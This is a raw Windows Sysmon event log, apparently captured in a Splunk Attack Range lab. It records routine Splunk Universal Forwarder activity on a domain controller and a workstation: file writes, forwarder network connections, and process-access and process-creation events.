11:17:07.474{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F66B469B78169E56D71CFB9A415BB38,SHA256=1C2B7A75DF5D4775C22E5BDB80C6549FC28B9EA449BC75C1F7A574F7BF8ABFF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221460Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:07.138{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D855D9CCFF49C0B35A836866EE34AC2,SHA256=DA5C978BA6B07715DA038E6736DFCE43DD421671B98A2AAB49DA20DCFDC0F708,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221462Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:06.651{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51651-false10.0.1.12-8000- 23542300x8000000000000000221461Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:08.138{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA49EE93C907886BA3C5BAB1777C18F7,SHA256=22DB108BFD94296D4B7A7E94CC1FA9B8B604B86C0B51BF2F777CE8E0CFD8EF34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297599Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:08.487{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24EB2B1419B5F299E9F0BE8A582FF50A,SHA256=5A3584A12E9D83A368D86C7D8182C18DAC0FB413C5CF4993DA0CB7720FE1B055,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221463Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:09.263{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C2D2B5A5C2BDC1E70ACA277930440A7,SHA256=53364D95162C134FBBC178CE5651987FC41E38ADC223B5318C8B4F2309AC972D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297600Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:09.500{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4B045E65E95C8E4A3A0CB598D76D636,SHA256=8BACFF0F69FD6A5BC016DA828AB8EC4B5EE32ADF45B296F6C58184F7EC5EA54A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221464Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:10.497{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B18ADEEBE324D43C2CF96C365D1120EA,SHA256=8F30E810B1DFCA52DEC4972E25AE90F99E41B9B848718149D27EAF51D16307F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297601Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:10.522{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D473E0B954FE2EC6FE45F3EB0B0A5251,SHA256=E6886C41A6B443875DA567D27497CA7DCA7525F3069B88854A8201C5431F7E29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221465Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:11.669{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C2A613F47E0C73789ADEA34BF67036F,SHA256=90B3B38B135D379C1E26BAFD16C8FF6CA03EA346312A5F9E1CE83B33B50B7789,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297602Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:11.528{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A60F8FB2C91D0F521D7C8A8685C69AE,SHA256=316D0F7673158459BF126EFCB0C076903B9D70685798EF72A8B75C9DF112D922,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297604Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:12.537{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89B04824B168B310CA31B10D591DA6FC,SHA256=372D4F16929537A21D2B94D5F11D1A5970EFC6F18261F01E820169C593C63BF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221466Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:12.700{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C0B876C9C5925279FE510F90B2223A1,SHA256=DEC7CC5E6E73128D38D75F707D7635FFC5136CC29638E12A0FA2A855DC917A0A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297603Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:09.587{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49462-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000221467Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:13.716{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35588841C893BE3C5BB1E2487AA94C40,SHA256=B507A2A3CA9400C6A3EE40E9685A67CCC3AE1B442CFB9A3C3533711EF862D4FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297605Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:13.548{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9970E11D498F73FCA642B1558AD7AE7D,SHA256=234C5E392FEC545552156021E2C8E2FBFF1106333BC8E15F780DF91215DCE9DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221469Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:14.731{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C864EE96B0F19A2126C1EE6A5A2E907,SHA256=B38BB4E56DC38685B23B66F747483DF1F8515E50A4E4B701A416616FE33082E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297606Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:14.560{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=223C960F4A8978108E927E2E7E4F0D2F,SHA256=0C82C7CA36A7D7B607CE6F9A66B512FC625E276DD932F95AE3F6DA3C8A624759,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221468Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:12.526{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51652-false10.0.1.12-8000- 23542300x8000000000000000221470Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:15.747{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D431D86373CA87960644B57CEFF2E406,SHA256=CC549A111E6569C51A43E3E6ADD53715E0D5F263E6AF74692C474CCCF3D5BB5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297607Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:15.575{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E2991A7CE9161A34A09E58370F0A753,SHA256=D2FB2BBF68215DC74165FBAB740B2C491D9D74E7A67818E0677EC95E1BFED8D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297608Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:16.575{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFA9B07F86085143A5A9627FD88E7501,SHA256=6AA5AC81DCC9D8BA59F53C0005DC126C736B64587156058ABEB1CF6BC5846593,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221471Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:16.794{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB568220F2CA335B7D6BA9B134E86333,SHA256=8F36CB52A38B1A1A3203346B236819256EC72220760A8E88A76EC7F2CBC9E6C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297609Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:17.580{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5584789082088C282469783ACDE1396B,SHA256=77347FFA5ED3EBB2B64C4D97E469DEFCDA6AA7426BDC5E6BF5ED33BFA3614531,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221472Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:17.825{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31A7C72E0AB20C2FB5044BC761BDF06B,SHA256=F4673120A8AF3C886CCD4A709EAFAE71375E56032D75B8A53CC25AB62548F7BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221473Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:17:18.825{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE6DCA2037FF391541A5C2A3171ED83A,SHA256=599A3ED19E358B42B3587CD9D02F7CD4D235361EA1BB955A169F1554A9FC6E90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297611Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:18.597{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7D6BD0C59A4034B90865B226735CC26,SHA256=A1A932108BAD9C487826F755D6AA9149E656922336C27F125D0B8D60EE9BFDB9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297610Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:15.514{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49463-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297621Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:19.616{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEBD1B597723637EC94CDA8E86E12B9F,SHA256=8B5CAB3B34C8956CE2D6CB3F980219C2670E01CDAE0DCBDF8E40EE03430BD736,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297620Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:19.536{C8EA50B7-17BF-6216-3307-000000003802}19765452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297619Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:19.337{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-17BF-6216-3307-000000003802}1976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297618Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:19.335{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297617Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:19.334{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297616Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:19.334{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297615Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:19.334{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-17BF-6216-3307-000000003802}1976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297614Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:19.334{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297613Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:19.333{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-17BF-6216-3307-000000003802}1976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297612Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:19.332{C8EA50B7-17BF-6216-3307-000000003802}1976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000297640Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:20.868{C8EA50B7-17C0-6216-3507-000000003802}37526096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297639Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:20.683{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-17C0-6216-3507-000000003802}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297638Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:17:20.683{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297637Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 